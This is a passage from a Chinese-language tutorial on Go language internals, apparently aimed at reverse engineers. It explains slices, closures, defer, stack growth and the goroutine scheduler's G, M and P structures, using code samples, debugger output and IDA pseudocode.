	log.Fatalf("%d %d %f %s %v", i, j, f, bytes, primes)
}
  • 基础类型 go 与 c 几乎一致

结构体和指针

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
package main

import "fmt"

// Point is a pair of integer coordinates.
type Point struct{ X, Y int }
// Rect1 stores its two corner Points by value.
type Rect1 struct{ Min, Max Point }
// Rect2 stores pointers to its two corner Points.
type Rect2 struct{ Min, Max *Point }

// main builds a Point by value and through a pointer, then a rectangle of each
// flavour, and prints them to show how values and pointers are formatted.
func main() {
	value := Point{X: 1, Y: 2} // a struct value
	ref := &Point{X: 1, Y: 2}  // a struct plus a pointer to it

	fmt.Println(value.X, value.Y, value, ref.X, ref.Y, ref)

	byValue := Rect1{Min: Point{X: 1, Y: 2}, Max: Point{X: 3, Y: 4}}
	byPointer := Rect2{Min: &Point{X: 1, Y: 2}, Max: &Point{X: 3, Y: 4}}
	fmt.Println(byValue, byPointer, byPointer.Max, byPointer.Min)
}
1
2
1 2 {1 2} 1 2 &{1 2}
{{1 2} {3 4}} {0xc00001e100 0xc00001e110} &{3 4} &{1 2}
  • 不同于 C 语言,Go 对指针进行了限制:不支持指针运算,未显式赋值的指针默认为 nil

字符串

1
2
3
4
5
6
7
8
9
10
package main

import "fmt"

// main slices a string to show that the substring shares the original's bytes:
// only the (pointer, length) pair differs.
func main() {
	var s string = "hello" // ptr=&"hello",len=5
	var t string = s[2:3]  // ptr=&"llo",len=1

	fmt.Println(s, t)
}
  • 字符串在 go 语言内存模型中用一个 16 字节的数据结构表示,它包含一个指向字符串存储数据的指针和一个长度数据
  • 因为 string 类型是不可变的,对于多字符串共享同一个存储数据是安全的

切片和数组

1
2
3
4
5
6
7
8
9
10
package main

import "fmt"

// main shows that re-slicing does not copy: y refers to elements 1..2 of the
// storage that backs x.
func main() {
x := []int{1, 2, 3, 4, 5} // creates a slice (not an array) backed by five values
y := x[1:3] // allocates no new element storage; only a new slice header referencing the same data

fmt.Println(x, y)
}
1
[1 2 3 4 5] [2 3]
  • 切片是对数组的一个连续片段的引用,片段可以是整个数组,也可以是数组的一部分
  • 在内存中,它是一个包含3个域的结构体:(数组的 slice 并不会实际复制一份数据,它只是创建一个新的数据结构)
    • 指向 slice 中第一个元素的指针
    • slice 的长度(下标操作的上界)
    • slice 的容量(分割操作的上界)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
package main

import "fmt"

// fun1 demonstrates how append interacts with a slice passed by value: the
// write before append lands in the caller's backing array, the write after it
// lands in the array append allocated.
func fun1(x []int) {
x[0] = 100
x = append(x, 6) /* the slice is full, so append grows it into newly allocated storage */
x[1] = 200
fmt.Println(x)
}

// main prints the slice before and after fun1 to show which of fun1's writes
// are visible to the caller.
func main() {
x := []int{1, 2, 3, 4, 5}
fmt.Println(x)

fun1(x)
fmt.Println(x)
}
1
2
3
[1 2 3 4 5]
[100 200 3 4 5 6]
[100 2 3 4 5]
  • 在对 slice 进行 append 等操作时,可能会触发 slice 的自动扩容,其扩容规则为:
    • 如果新的大小是当前大小2倍以上,则大小增长为新大小
    • 否则循环以下操作:如果当前大小小于1024,按每次2倍增长,否则每次按当前大小1/4增长,直到增长的大小超过或等于新大小
  • 扩容时生成了新的空间,导致 x[1] = 200 没有写入 main 中的数组
  • 另外 main 中的 x 和 fun1 中的 x 是两个不同的对象,它们指向同一个数组但却拥有彼此独立的长度(main 中的 x 长度为 “5”,fun1 中的 x 长度为 “6”)

映射

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
package main

import "fmt"

// main creates an empty map, inserts three keys and prints the length before
// and after, followed by the type and value stored under each key.
func main() {
var m = make(map[string]int)

fmt.Printf("Map len = %d\n", len(m))

m["zero"] = 0
m["one"] = 1
m["two"] = 2

fmt.Printf("Map len = %d\n", len(m))

// %T prints the dynamic type of the value, %v the value itself.
fmt.Printf("zero = %T, %v\n", m["zero"], m["zero"])
fmt.Printf("one = %T, %v\n", m["one"], m["one"])
fmt.Printf("two = %T, %v\n", m["two"], m["two"])
}
1
2
3
4
5
Map len = 0
Map len = 3
zero = int, 0
one = int, 1
two = int, 2
  • Map 是一种键值对的无序集合(go 中的 map 在底层是用哈希表实现的)

动态内存分配 make 和 new

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
package main

import (
"fmt"
"sync"
)

// main allocates one value with new and one slice with make so that the two
// allocation paths can be compared.
func main() {
u := new(user) // pointer to a zero-valued user
s := make([]int, 5, 100) // slice with length 5 and capacity 100

fmt.Println(u)
fmt.Println(s)
}

// user is the sample struct allocated with new in main.
type user struct {
lock sync.Mutex
name string
age int
}

对于动态内存申请,go 有两个不同的关键字 make 和 new:

  • make 的作用是初始化内置的数据结构(slice ,map,channel)
  • new 的作用是根据传入的类型分配一片内存空间并返回指向这片内存空间的指针
1
2
3
4
0x4804e0 <main.main+32>    call   40c100h                       <runtime[newobject]> /* new */

RAX 0x48f5e0 (type:*+58848) ◂— 0x20 /* ' ' */
RBX 0x0
1
2
3
4
5
0x480500 <main.main+64>    call   445fa0h                       <runtime[makeslice]> /* make */

RAX 0x487e80 (type:*+28288) ◂— 0x8
RBX 0x5
RCX 0x64

函数调用

调用约定

1
2
3
4
5
6
7
8
9
10
11
12
13
package main

import (
"fmt"
)

// addtest takes fifteen uint64 arguments and prints their sum; the long
// parameter list exists to show how arguments are passed to a function.
func addtest(a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11, a12, a13, a14, a15 uint64) {
fmt.Println(a1 + a2 + a3 + a4 + a5 + a6 + a7 + a8 + a9 + a10 + a11 + a12 + a13 + a14 + a15)
}

// main calls addtest with the constants 1..15 so that each argument is easy to
// recognise in a disassembly.
func main() {
addtest(1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15)
}
1
2
3
4
5
6
0x4805f8 <main.main+24>    mov    qword ptr [rsp], 0ah
0x480600 <main.main+32> mov qword ptr [rsp + 8], 0bh
0x480609 <main.main+41> mov qword ptr [rsp + 10h], 0ch
0x480612 <main.main+50> mov qword ptr [rsp + 18h], 0dh
0x48061b <main.main+59> mov qword ptr [rsp + 20h], 0eh
0x480624 <main.main+68> mov qword ptr [rsp + 28h], 0fh
1
2
3
4
5
6
0x48062d <main.main+77>     mov    eax, 1                        <main.main>
0x480632 <main.main+82> mov ebx, 2
0x480637 <main.main+87> mov ecx, 3
0x48063c <main.main+92> mov edi, 4
0x480641 <main.main+97> mov esi, 5
0x480646 <main.main+102> mov r8d, 6
  • 前9个参数进入寄存器,后续参数存放入栈中
1
2
3
4
5
6
00:0000│ rsp 0xc00007cef0 —▸ 0x480665 (main.main+133) ◂— mov    rbp, qword ptr [rsp + 78h]
01:0008│     0xc00007cef8 ◂— 0xa /* '\n' */
02:0010│     0xc00007cf00 ◂— 0xb /* '\x0b' */
03:0018│     0xc00007cf08 ◂— 0xc /* '\x0c' */
04:0020│     0xc00007cf10 ◂— 0xd /* '\r' */
05:0028│     0xc00007cf18 ◂— 0xe

多值返回

1
2
3
4
5
6
7
8
9
10
11
12
13
package main

import (
"fmt"
)

// retest returns three values at once to demonstrate multiple return values.
func retest() (int, int, int) {
return 1, 2, 3
}

// main forwards all three results of retest directly to fmt.Println.
func main() {
fmt.Println(retest())
}
1
2
3
4
5
6
7
8
9
RAX  0x498948 (go:string.*+1328) ◂— 0x3131313131313131 ('11111111')
RBX 0x7
RCX 0x498956 (go:string.*+1342) ◂— 0x3332323232323232 ('22222223')
RDX 0x8
RDI 0x7
RSI 0x49895d (go:string.*+1349) ◂— 0x3933333333333333 ('33333339')
R8 0x7
R9 0x0
R10 0x60
  • 返回值会使用9个寄存器,剩下的存储在栈中

闭包

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
package main

import "fmt"

// incSeq returns a counter function; every call of the returned function
// increments and returns the same captured variable i.
func incSeq() func() int {
var i = 0
return func() int { /* this function declares no i of its own; it refers to the i of the enclosing scope */
i++
return i
}
}

// main obtains one counter from incSeq and calls it six times, showing that
// the captured state persists between calls.
func main() {
	counter := incSeq()

	fmt.Printf("start = %d\n", counter())

	for step := 0; step < 5; step++ {
		fmt.Printf("index(%d) = %d\n", step+1, counter())
	}
}
1
2
3
4
5
6
start = 1
index(1) = 2
index(2) = 3
index(3) = 4
index(4) = 5
index(5) = 6
  • 闭包是由函数及其相关引用环境组合而成的实体
  • 返回闭包时并不是单纯返回一个函数,而是返回了一个结构体,记录有函数的入口地址和引用环境中的变量地址
  • 最后还有一个小问题,var i = 0 原本应该分配到栈上,但 go 编译器会自动识别这种情况并将其分配到堆上
1
2
3
4
5
6
7
8
9
10
11
12
13
14
package main

func incSeq() func() int { // returns a closure over i
var i = 0 // captured by the closure below
return func() int { // the function literal that captures i
i++
return i
}
}

func main() { // comments are kept on existing lines so the line numbers of this listing do not shift
next := incSeq()
next()
}
1
go build --gcflags=-m test.go
  • 使用逃逸分析(escape analysis)查看变量的分配位置
1
2
3
4
5
6
7
8
9
# command-line-arguments
./test.go:3:6: can inline incSeq
./test.go:5:9: can inline incSeq.func1
./test.go:12:16: inlining call to incSeq
./test.go:5:9: can inline main.func1
./test.go:13:6: inlining call to main.func1
./test.go:4:6: moved to heap: i /* 被转移到堆空间 */
./test.go:5:9: func literal escapes to heap
./test.go:12:16: func literal does not escape

关键字-go

go 语言支持并发,我们只需要通过 go 关键字来开启 goroutine(协程,轻量级线程)即可

  • 协程:普通的子程序调用总是一个入口、一次返回,一旦退出即完成了子程序的执行;而协程在执行过程中可以被挂起,转而执行其他协程,之后再从挂起处恢复执行
1
2
3
4
5
6
7
8
9
10
11
12
package main

import "fmt"

// gotest prints its three arguments and returns their sum; it is the function
// started as a goroutine by main.
func gotest(a, b, c int) int {
fmt.Println(a, b, c)
return a + b + c
}

// main starts gotest in a new goroutine and returns immediately.
// Because the program exits when main returns, without waiting for other
// goroutines, gotest may never get to print; the snippet only serves to show
// what the go statement compiles to.
func main() {
go gotest(1, 2, 3)
}
  • go 关键字的底层其实是调用 runtime.newproc 函数
1
0x4805e0 <main.main+32>    call   43bc80h                       <runtime[newproc]>
1
2
3
RAX  0x4a0970 (go:func.*+552) —▸ 0x480600 (main.main.func1) ◂— cmp    rsp, qword ptr [r14 + 10h]
RBX 0x0
RCX 0x0
  • 函数 runtime.newproc 负责创建一个新的 goroutine(协程):新建一个栈空间,将栈参数拷贝到新栈空间中并让栈指针指向参数
  • 另外编译器会为 gotest 生成一个辅助函数,IDA 分析如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
void __golang main_main_func1()
{
__int64 v0; // rbp
int v1; // r14
char **v2; // r12
__int64 v3[4]; // [rsp-18h] [rbp-20h] BYREF
void *retaddr; // [rsp+8h] [rbp+0h] BYREF
char v5; // [rsp+10h] [rbp+8h] BYREF

if ( (unsigned int)&retaddr <= *(_QWORD *)(v1 + 16LL) )
runtime_morestack_noctxt();
v3[3LL] = v0;
v2 = *(char ***)(v1 + 32LL);
if ( v2 && *v2 == &v5 )
*v2 = (char *)v3;
main_gotest(v3[0LL], v3[1LL], v3[2LL]); /* 执行原函数 */
}

关键字-defer

defer 用于资源的释放,会在函数返回之前进行调用(defer 语句保证了不论是在正常情况下,还是非正常情况下,函数或方法都能够执行)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
package main

// A registers three deferred calls and then prints "start"; the deferred calls
// run when A returns, in reverse order of registration.
func A() {
defer println("1") // registered first, runs last
defer func() {
defer println("2") // runs when this anonymous function returns
}()
defer println("3") // registered last, runs first
println("start")
}

// main simply runs the defer demonstration.
func main() {
A()
}
1
2
3
4
start
3
2
1
  • 在 return 之前,程序会调用 defer 表达式
  • 如果有多个 defer 表达式,调用顺序类似于栈,越后面的 defer 表达式越先被调用
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
package main

import "fmt"

// f returns 1: the deferred closure increments the named result after
// "return 0" has assigned it.
func f() (result int) {
defer func() {
result++
}()
return 0
}
// f2 returns 5: the deferred closure changes the local t, not the result r,
// which was already set from t.
func f2() (r int) {
t := 5
defer func() {
t = t + 5
}()
return t
}
// f3 returns 1: the deferred function works on its own parameter r, a copy
// taken when the defer statement was evaluated.
func f3() (r int) {
defer func(r int) {
r = r + 5
}(r)
return 1
}
// main prints the three results.
func main() {
fmt.Println(f())
fmt.Println(f2())
fmt.Println(f3())
}
1
2
3
1
5
1
  • return 这一条语句并不是一条原子指令,它拥有赋值和返回两个步骤,而 defer 语句则会在这两个步骤之间运行
  • 因此上面的样例可以等价修改成下面的代码:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
package main

import "fmt"

func f() (result int) {
result = 0
defer func() {
result++
}()
return /* 返回值为'1' */
}
func f2() (r int) {
t := 5
r = t
defer func() {
t = t + 5
}()
return /* 返回值为'5' */
}
func f3() (r int) {
r = 1
defer func(r int) {
r = r + 5
}(r)
return /* 返回值为'1' */
}
func main() {
fmt.Println(f())
fmt.Println(f2())
fmt.Println(f3())
}
  • 编译器会先为每个 defer 语句生成一个辅助函数,然后在返回值赋值以后函数执行 ret 指令之前调用该函数
1
0x458096 <main[A]+86>     call   458100h                       <main.A.func1>

分段栈和连续栈

goroutine 可以初始时只给栈分配很小的空间,然后随着使用过程中的需要自动地增长

  • 每次执行函数调用时 Go 的 runtime 都会进行检测,若当前栈的大小不够用,则会触发“中断”,从当前函数进入到 Go 的运行时库
  • 然后分配一个新的足够大的栈空间,接下来的处理有不同的策略

在 IDA 的伪代码中经常可以看到如下代码:

1
2
if ( (unsigned int)&retaddr <= *(_QWORD *)(v1 + 16LL) )
runtime_morestack_noctxt();
  • 函数 morestack_noctxt 用于扩展栈

在 go-1.3 版本之前,使用的栈结构是分段栈:

  • 随着 goroutine 调用的函数层级的深入或者局部变量需要的越来越多时,栈空间可能会出现不够用的情况
  • 在运行时会调用 runtime.morestack 和 runtime.newstack 创建一个新的栈空间,这些栈空间是不连续的,当前 goroutine 的多个栈空间会以双向链表的形式串联起来,运行时会通过指针找到各个栈片段
  • 当调用回溯的时候,不再使用的栈空间将会被系统回收

但分段栈有一个问题,如果当前 goroutine 的栈几乎充满,那么任意的函数调用都会触发栈的扩容,当函数返回后又会触发栈的收缩,如果在一个循环中调用函数,栈的分配和释放就会造成巨大的额外开销,这被称为热分裂问题

连续栈可以解决分段栈中存在的上述问题:

  • 其核心原理就是每当程序的栈空间不足时,初始化一片比旧栈大两倍的新栈并将原栈中的所有值都迁移到新的栈中,新的局部变量或者函数调用就有了充足的内存空间

使用连续栈机制时,栈空间不足导致的扩容会经历以下几个步骤:

  • 调用 runtime.newstack 在内存空间中分配更大的栈内存空间
  • 使用 runtime.copystack 将旧栈中的所有内容复制到新的栈中
  • 将指向旧栈对应变量的指针重新指向新栈
  • 调用 runtime.stackfree 销毁并回收旧栈的内存空间

系统调用

go 的 syscall 库中提供了对系统调用的封装,它会在真正执行系统调用之前先调用函数 entersyscall,并在系统调用函数返回后调用 exitsyscall 函数

1
2
3
4
5
6
7
// syscall_syscall packs the function pointer, its three arguments and the
// result slots into one struct, brackets the call with entersyscall and
// exitsyscall, and returns the result fields of that struct.
func syscall_syscall(fn, a1, a2, a3 uintptr) (r1, r2, err uintptr) {
args := struct{ fn, a1, a2, a3, r1, r2, err uintptr }{fn, a1, a2, a3, r1, r2, err}
entersyscall() // tell the runtime this goroutine is entering a system call
libcCall(unsafe.Pointer(abi.FuncPCABI0(syscall)), unsafe.Pointer(&args))
exitsyscall() // tell the runtime the system call has finished
return args.r1, args.r2, args.err
}

这两个函数就是通知 go 的运行时库这个 goroutine 进入了系统调用或者完成了系统调用,调度器会做相应的调度

  • entersyscall:
    • 把当前 M 的 P 设置为 _Psyscall 状态,打上标识解绑 P -> M 的绑定,但 M 还保留 P 的指针
  • exitsyscall:
    • 由于 M 到 P 的指向还在,那么优先还是用原来的 P,如果原来的 P 被处理掉了,那么就去用一个新的 P,如果还没有,那就只能把 G 挂到全局队列了
    • Go 的 sysmon(内部监控线程)发现有这种卡了超过 10 ms 的 M ,那么就会把 P 剥离出来,给到其他的 M 去处理执行,M 数量不够就会新创建

协程调度

go 的调度的实现,涉及到几个重要的数据结构,运行时库用这几个数据结构来实现 goroutine 的调度,管理 goroutine 和物理线程的运行,这些数据结构分别是结构体G,结构体M,结构体P,以及Sched结构体

结构体G

G 是 goroutine 的缩写,相当于操作系统中的进程控制块,在这里就是 goroutine 的控制结构,是对 goroutine 的抽象

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
// g is the runtime's control structure for one goroutine (quoted from the Go
// runtime source).
type g struct {
stack stack // offset known to runtime/cgo
/* type stack struct {
lo uintptr // low bound of the stack owned by this goroutine
hi uintptr // high bound of the stack owned by this goroutine
} */
stackguard0 uintptr // value the stack pointer is checked against; the stack is grown when SP drops below it
stackguard1 uintptr // second stack-check value -- NOTE(review): in the Go source this one is used by the system-stack prologue; confirm against runtime2.go

_panic *_panic // innermost panic - offset known to liblink
_defer *_defer // innermost defer
m *m // current m; offset known to arm liblink
sched gobuf // saved context used when switching goroutines
syscallsp uintptr // if status==Gsyscall, syscallsp = sched.sp to use during gc
syscallpc uintptr // if status==Gsyscall, syscallpc = sched.pc to use during gc
stktopsp uintptr // expected sp at top of stack, to check in traceback
// param is a generic pointer parameter field used to pass
// values in particular contexts where other storage for the
// parameter would be difficult to find. It is currently used
// in four ways:
// 1. When a channel operation wakes up a blocked goroutine, it sets param to
// point to the sudog of the completed blocking operation.
// 2. By gcAssistAlloc1 to signal back to its caller that the goroutine completed
// the GC cycle. It is unsafe to do so in any other way, because the goroutine's
// stack may have moved in the meantime.
// 3. By debugCallWrap to pass parameters to a new goroutine because allocating a
// closure in the runtime is forbidden.
// 4. When a panic is recovered and control returns to the respective frame,
// param may point to a savedOpenDeferState.
param unsafe.Pointer // parameter hand-off: set by another goroutine while this one sleeps, read by this one on wake-up
atomicstatus atomic.Uint32
stackLock uint32 // sigprof/scang lock; TODO: fold in to atomicstatus
goid uint64 // id of this goroutine
schedlink guintptr
waitsince int64 // approx time when the g become blocked
waitreason waitReason // if status==Gwaiting

preempt bool // preemption signal, duplicates stackguard0 = stackpreempt
preemptStop bool // transition to _Gpreempted on preemption; otherwise, just deschedule
preemptShrink bool // shrink stack at synchronous safe point

// asyncSafePoint is set if g is stopped at an asynchronous
// safe point. This means there are frames on the stack
// without precise pointer information.
asyncSafePoint bool

paniconfault bool // panic (instead of crash) on unexpected fault address
gcscandone bool // g has scanned stack; protected by _Gscan bit in status
throwsplit bool // must not split stack
// activeStackChans indicates that there are unlocked channels
// pointing into this goroutine's stack. If true, stack
// copying needs to acquire channel locks to protect these
// areas of the stack.
activeStackChans bool
// parkingOnChan indicates that the goroutine is about to
// park on a chansend or chanrecv. Used to signal an unsafe point
// for stack shrinking.
parkingOnChan atomic.Bool
// inMarkAssist indicates whether the goroutine is in mark assist.
// Used by the execution tracer.
inMarkAssist bool
coroexit bool // argument to coroswitch_m

raceignore int8 // ignore race detection events
nocgocallback bool // whether disable callback from C
tracking bool // whether we're tracking this G for sched latency statistics
trackingSeq uint8 // used to decide whether to track this G
trackingStamp int64 // timestamp of when the G last started being tracked
runnableTime int64 // the amount of time spent runnable, cleared when running, only used when tracking
lockedm muintptr // the M this G is locked to; the G may only run on that M
sig uint32
writebuf []byte
sigcode0 uintptr
sigcode1 uintptr
sigpc uintptr
parentGoid uint64 // goid of the goroutine that created this goroutine
gopc uintptr // pc of the go statement that created this goroutine
ancestors *[]ancestorInfo // ancestor information goroutine(s) that created this goroutine (only used if debug.tracebackancestors)
startpc uintptr // pc of goroutine function
racectx uintptr
waiting *sudog // sudog structures this g is waiting on (that have a valid elem ptr); in lock order
cgoCtxt []uintptr // cgo traceback context
labels unsafe.Pointer // profiler labels
timer *timer // cached timer for time.Sleep
sleepWhen int64 // when to sleep until
selectDone atomic.Uint32 // are we participating in a select and did someone win the race?

coroarg *coro // argument during coroutine transfers

// goroutineProfiled indicates the status of this goroutine's stack for the
// current in-progress goroutine profile
goroutineProfiled goroutineProfileStateHolder

// Per-G tracer state.
trace gTraceState

// Per-G GC state

// gcAssistBytes is this G's GC assist credit in terms of
// bytes allocated. If this is positive, then the G has credit
// to allocate gcAssistBytes bytes without assisting. If this
// is negative, then the G must correct this by performing
// scan work. We track this in bytes to make it fast to update
// and check for debt in the malloc hot path. The assist ratio
// determines how this corresponds to scan work debt.
gcAssistBytes int64
}
  • goroutine 切换时,上下文信息保存在结构体的 sched 域中,goroutine 切换时并不必陷入到操作系统内核中

结构体M

M 是 machine 的缩写,是对机器的抽象,每个 M 都是对应到一条操作系统的物理线程

  • M 必须关联了 P 才可以执行 go 代码
  • 当它处理阻塞或者系统调用时,可以不需要关联 P
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
// m is the runtime's representation of one operating-system thread (quoted
// from the Go runtime source).
type m struct {
g0 *g // goroutine with scheduling stack
morebuf gobuf // gobuf arg to morestack
divmod uint32 // div/mod denominator for arm - known to liblink
_ uint32 // align next field to 8 bytes

// Fields not known to debuggers.
procid uint64 // for debuggers, but offset not hard-coded
gsignal *g // signal-handling g
goSigStack gsignalStack // Go-allocated signal handling stack
sigmask sigset // storage for saved signal mask
tls [tlsSlots]uintptr // thread-local storage (for x86 extern register)
mstartfn func()
curg *g // goroutine currently running on this M
caughtsig guintptr // goroutine running during fatal signal
p puintptr // attached p for executing go code (nil if not executing go code)
nextp puintptr
oldp puintptr // the p that was attached before executing a syscall
id int64
mallocing int32 // state flag -- NOTE(review): presumably non-zero while this M is inside the allocator; confirm against the runtime source
throwing throwType
preemptoff string // if != "", keep curg running on this m
locks int32
dying int32
profilehz int32
spinning bool // m is out of work and is actively looking for work
blocked bool // m is blocked on a note
newSigstack bool // minit on C thread called sigaltstack
printlock int8
incgo bool // m is executing a cgo call
isextra bool // m is an extra m
isExtraInC bool // m is an extra m that is not executing Go code
isExtraInSig bool // m is an extra m in a signal handler
freeWait atomic.Uint32 // Whether it is safe to free g0 and delete m (one of freeMRef, freeMStack, freeMWait)
needextram bool
traceback uint8
ncgocall uint64 // number of cgo calls in total
ncgo int32 // number of cgo calls currently in progress
cgoCallersUse atomic.Uint32 // if non-zero, cgoCallers in use temporarily
cgoCallers *cgoCallers // cgo traceback if crashing in cgo call
park note
alllink *m // link in the allm list
schedlink muintptr
lockedg guintptr
createstack [32]uintptr // stack that created this thread, it's used for StackRecord.Stack0, so it must align with it.
lockedExt uint32 // tracking for external LockOSThread
lockedInt uint32 // tracking for internal lockOSThread
nextwaitm muintptr // next m waiting for lock

mLockProfile mLockProfile // fields relating to runtime.lock contention

// wait* are used to carry arguments from gopark into park_m, because
// there's no stack to put them on. That is their sole purpose.
waitunlockf func(*g, unsafe.Pointer) bool
waitlock unsafe.Pointer
waitTraceBlockReason traceBlockReason
waitTraceSkip int

syscalltick uint32
freelink *m // on sched.freem
trace mTraceState

// these are here because they are too large to be on the stack
// of low-level NOSPLIT functions.
libcall libcall
libcallpc uintptr // for cpu profiler
libcallsp uintptr
libcallg guintptr
syscall libcall // stores syscall parameters on windows

vdsoSP uintptr // SP for traceback while in VDSO call (0 if not in call)
vdsoPC uintptr // PC for traceback while in VDSO call

// preemptGen counts the number of completed preemption
// signals. This is used to detect when a preemption is
// requested, but fails.
preemptGen atomic.Uint32

// Whether this is a pending preemption signal on this M.
signalPending atomic.Uint32

// pcvalue lookup cache
pcvalueCache pcvalueCache

dlogPerM

mOS

chacha8 chacha8rand.State
cheaprand uint64

// Up to 10 locks held by this m, maintained by the lock ranking code.
locksHeldLen int
locksHeld [10]heldLockInfo
}
  • 普通的 goroutine 的栈是在堆上分配的可增长的栈,而 g0 的栈是 M 对应的线程的栈
  • 所有调度相关的代码,会先切换到该 goroutine 的栈中再执行

结构体P

P 是 Processor 逻辑处理器的缩写,每个 P 拥有一个本地队列并为 G 在 M 上的运行提供本地化资源

  • M 代表 OS 线程,P 代表 go 代码执行时需要的资源,当 M 执行 go 代码时,它需要关联一个 P
  • 所有的 P 被组织为一个数组,在 P 上实现了工作流窃取的调度器
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
// p is the runtime's logical processor: it owns a local run queue and the
// per-P resources an M needs while executing Go code (quoted from the Go
// runtime source).
type p struct {
id int32
status uint32 // one of pidle/prunning/...
link puintptr
schedtick uint32 // incremented on every scheduling round
syscalltick uint32 // incremented on every system call
sysmontick sysmontick // last tick observed by sysmon
m muintptr // back-link to associated m (nil if idle)
mcache *mcache // per-P allocation cache -- NOTE(review): the original note called it a "system thread cache"; confirm against runtime/mcache.go
pcache pageCache
raceprocctx uintptr

deferpool []*_defer // pool of available defer structs (see panic.go)
deferpoolbuf [32]*_defer

// Cache of goroutine ids, amortizes accesses to runtime·sched.goidgen.
goidcache uint64
goidcacheend uint64

// Queue of runnable goroutines. Accessed without lock.
runqhead uint32
runqtail uint32
runq [256]guintptr
// runnext, if non-nil, is a runnable G that was ready'd by
// the current G and should be run next instead of what's in
// runq if there's time remaining in the running G's time
// slice. It will inherit the time left in the current time
// slice. If a set of goroutines is locked in a
// communicate-and-wait pattern, this schedules that set as a
// unit and eliminates the (potentially large) scheduling
// latency that otherwise arises from adding the ready'd
// goroutines to the end of the run queue.
//
// Note that while other P's may atomically CAS this to zero,
// only the owner P can CAS it to a valid G.
runnext guintptr

// Available G's (status == Gdead)
gFree struct {
gList
n int32
}

sudogcache []*sudog
sudogbuf [128]*sudog

// Cache of mspan objects from the heap.
mspancache struct {
// We need an explicit length here because this field is used
// in allocation codepaths where write barriers are not allowed,
// and eliminating the write barrier/keeping it eliminated from
// slice updates is tricky, more so than just managing the length
// ourselves.
len int
buf [128]*mspan
}

// Cache of a single pinner object to reduce allocations from repeated
// pinner creation.
pinnerCache *pinner

trace pTraceState

palloc persistentAlloc // per-P to avoid mutex

// Per-P GC state
gcAssistTime int64 // Nanoseconds in assistAlloc
gcFractionalMarkTime int64 // Nanoseconds in fractional mark worker (atomic)

// limiterEvent tracks events for the GC CPU limiter.
limiterEvent limiterEvent

// gcMarkWorkerMode is the mode for the next mark worker to run in.
// That is, this is used to communicate with the worker goroutine
// selected for immediate execution by
// gcController.findRunnableGCWorker. When scheduling other goroutines,
// this field must be set to gcMarkWorkerNotWorker.
gcMarkWorkerMode gcMarkWorkerMode
// gcMarkWorkerStartTime is the nanotime() at which the most recent
// mark worker started.
gcMarkWorkerStartTime int64

// gcw is this P's GC work buffer cache. The work buffer is
// filled by write barriers, drained by mutator assists, and
// disposed on certain GC state transitions.
gcw gcWork

// wbBuf is this P's GC write barrier buffer.
//
// TODO: Consider caching this in the running G.
wbBuf wbBuf

runSafePointFn uint32 // if 1, run sched.safePointFn at next safe point

// statsSeq is a counter indicating whether this P is currently
// writing any stats. Its value is even when not, odd when it is.
statsSeq atomic.Uint32

// Timer heap.
timers timers

// maxStackScanDelta accumulates the amount of stack space held by
// live goroutines (i.e. those eligible for stack scanning).
// Flushed to gcController.maxStackScan once maxStackScanSlack
// or -maxStackScanSlack is reached.
maxStackScanDelta int64

// gc-time statistics about current goroutines
// Note that this differs from maxStackScan in that this
// accumulates the actual stack observed to be used at GC time (hi - sp),
// not an instantaneous measure of the total stack size that might need
// to be scanned (hi - lo).
scannedStackSize uint64 // stack size of goroutines scanned by this P
scannedStacks uint64 // number of goroutines scanned by this P

// preempt is set to indicate that this P should be enter the
// scheduler ASAP (regardless of what G is running on it).
preempt bool

// pageTraceBuf is a buffer for writing out page allocation/free/scavenge traces.
//
// Used only if GOEXPERIMENT=pagetrace.
pageTraceBuf pageTraceBuf

// Padding is no longer needed. False sharing is now not a worry because p is large enough
// that its size class is an integer multiple of the cache line size (for any of our architectures).
}
  • 在 P 中有一个 Grunnable 的 goroutine 队列,这是一个 P 的局部队列
  • 当 P 执行 go 代码时,它会优先从自己的这个局部队列中取,这时可以不用加锁,提高了并发度
  • 如果发现这个队列空了,则去其它 P 的队列中拿一半过来,这样实现工作窃取(work stealing)的调度(这种情况下是需要给调度器加锁的)

结构体 Sched

Sched 是调度实现中使用的数据结构

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
